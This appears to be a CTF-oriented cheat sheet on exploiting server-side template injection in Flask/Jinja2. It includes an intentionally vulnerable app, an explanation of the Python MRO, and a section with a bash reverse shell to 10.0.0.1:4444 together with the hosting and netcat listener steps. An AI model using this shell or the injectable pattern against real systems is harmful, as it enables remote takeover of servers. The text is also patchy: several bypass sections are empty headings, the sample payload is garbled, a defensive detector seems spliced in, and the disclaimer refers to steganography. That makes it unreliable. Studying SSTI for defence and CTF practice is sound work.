
FLASK JINJA PENTESTING

Flask is a micro web framework written in Python.

Common Directories

```text
/app.py
/main.py
/modules.py
/modules/__init__.py
/modules/admin.py
```

Server-Side Template Injection (SSTI)

A server-side template injection is a vulnerability that occurs when a server renders user input as a template of some sort. Templates are used when only minor details of a page need to change from one request to the next. For example, depending on the IP address that accesses a site, the page may look like this:

```html
<h1>Welcome to the page!</h1>
<u>This page is being accessed from the remote address: </u>
```

Instead of creating a whole new page for every visitor, the server simply renders the remote address into the ```` variable and reuses the rest of the HTML for each request it receives at that endpoint.

This can be abused, since some template engines support fairly complex functionality that ultimately lets a developer run commands or read file contents straight from the template.

So when the power to create and render templates is handed to a user, it can lead to full access to the system as the user running the web server.

What is ‘MRO’?

MRO (Method Resolution Order) is the order in which Python looks for methods in a class hierarchy. When a method is called on an object, Python searches for a matching method in the sequence determined by the MRO. This sequence is therefore the order in which Python walks the inheritance chain of the class.

Example :

```python
class A:
    def process(self):
        print('A process()')

class B:
    def process(self):
        print('B process()')

class C(A, B):
    def process(self):
        print('C process()')

class D(C, B):
    pass

obj = D()
obj.process()

print(D.mro())
```

In this example, when an instance of D calls the process() method, Python looks for the method along the MRO sequence. The output of print(D.mro()) gives the MRO sequence for class D:

```text
[<class '__main__.D'>, <class '__main__.C'>, <class '__main__.A'>, <class '__main__.B'>, <class 'object'>]
```

This MRO sequence shows that the process() method is looked up first in class D, then in class C, followed by A, B, and finally object (the base class of all classes in Python).

By using the MRO, we can understand the order of class inheritance and identify which class will be used in a given situation. This is especially useful with multiple inheritance, and in the context of constructing SSTI payloads for Jinja2, where the MRO is how a template expression walks from a simple object up to the object base class.

```python
from flask import Flask, request, render_template_string

app = Flask(__name__)

@app.route("/")
def home():
    if request.args.get('c'):
        # The user-controlled 'c' parameter is rendered as the template
        # itself, not as data passed into a fixed template: this is the SSTI.
        return render_template_string(request.args.get('c'))
    else:
        return "Hi!!!"

if __name__ == "__main__":
    app.run(debug=True)
```

Installation

  • sudo apt-get install python-pip
  • pip install flask --user
  • python app.py

Sometimes a website may filter specific characters. If so, URL-encode the payload or convert it to hex. In addition, it is recommended to send requests with Burp Suite, because web browsers automatically alter the payload.

Payload

```text
# Remove curly brackets
{2*3}
2*3
```

If this succeeds, you may be able to escalate to OS command injection.
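From the defender's side, the same facts matter in reverse: the arithmetic probe, the Jinja delimiters and the dunder attributes used for an MRO walk are what a request carrying an SSTI probe has to contain, and the URL-encoding and hex tricks above mean the request must be decoded before matching. The following is an added example, not code from the original post; it is a stdlib-only detector run over constructed access-log lines for the `/?c=` endpoint shown above, and the log lines, regexes and finding labels are this example's own assumptions.

```python
import re
from urllib.parse import unquote

# Signals an SSTI probe has to carry: Jinja delimiters, the arithmetic
# probe from the cheat sheet ({{2*3}} or its single-brace variant), and
# Python dunder attributes, the building blocks of an MRO walk.
TEMPLATE_DELIMS = re.compile(r"\{\{|\{%|\{#|%\}|\}\}")
ARITH_PROBE = re.compile(r"\{\{?\s*\d+\s*\*\s*\d+\s*\}\}?")
DUNDER_ATTR = re.compile(r"__[a-z]+__")
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
REQUEST_PATH = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def normalize(value: str, rounds: int = 3) -> str:
    """Undo URL-encoding (repeated, to catch double encoding) and \\xNN
    string escapes, so obfuscated probes hit the same rules as plain ones."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)


def classify(query: str) -> list[str]:
    """Return the SSTI indicators found in one request path, after decoding."""
    text = normalize(query)
    findings = []
    if ARITH_PROBE.search(text):
        findings.append("arithmetic-probe")
    if TEMPLATE_DELIMS.search(text):
        findings.append("template-delimiter")
    if DUNDER_ATTR.search(text):
        findings.append("dunder-attribute")
    return findings


def scan_log(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Return (line index, findings) for every request line that matched."""
    hits = []
    for idx, line in enumerate(lines):
        m = REQUEST_PATH.search(line)
        if m and (findings := classify(m.group(1))):
            hits.append((idx, findings))
    return hits


# Constructed access-log lines for the /?c= endpoint (not real traffic):
# plain text, URL-encoded, double-encoded, \x-escaped and single-brace probes.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?c=hello_world HTTP/1.1" 200 5',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?c=%7B%7B7*7%7D%7D HTTP/1.1" 200 2',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?c=%257B%257Bself.%255F%255Fclass%255F%255F%257D%257D HTTP/1.1" 200 40',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /?c=%7B%7Bx%5B%22%5Cx5f%5Cx5fmro%5Cx5f%5Cx5f%22%5D%7D%7D HTTP/1.1" 500 0',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /?c=%7B2*3%7D HTTP/1.1" 200 5',
]

if __name__ == "__main__":
    for idx, findings in scan_log(SAMPLE_LOG):
        print(idx, findings)
```

The benign first line produces no finding, while each obfuscated variant is decoded back to the same plain probe before the rules run, which is the property a filter that only matches raw query strings lacks.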

RCE bypassing

waf blocks “.”:

waf blocks “.” and “_”:

Bypassing the blocks on “.”, “_”, “[]” and “|join”

Reverse Shell

Filter bypass - Base64 encode

Alternatively, we can write a shell script for the reverse shell and then execute it on the server side. For example, create a shell script named revshell on the local machine.

```bash
#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
```

Then host it and start a listener to receive the incoming connection.

```bash
# Local terminal 1
python3 -m http.server 8000

# Local terminal 2
nc -lvnp 4444
```

DISCLAIMER

This cheatsheet is intended to guide CTF players in their research. This cheatsheet is not representative of modern steganography/steganalysis techniques, and its content does match the creation of interesting challenges 😉.
This post is licensed under CC BY 4.0 by the author.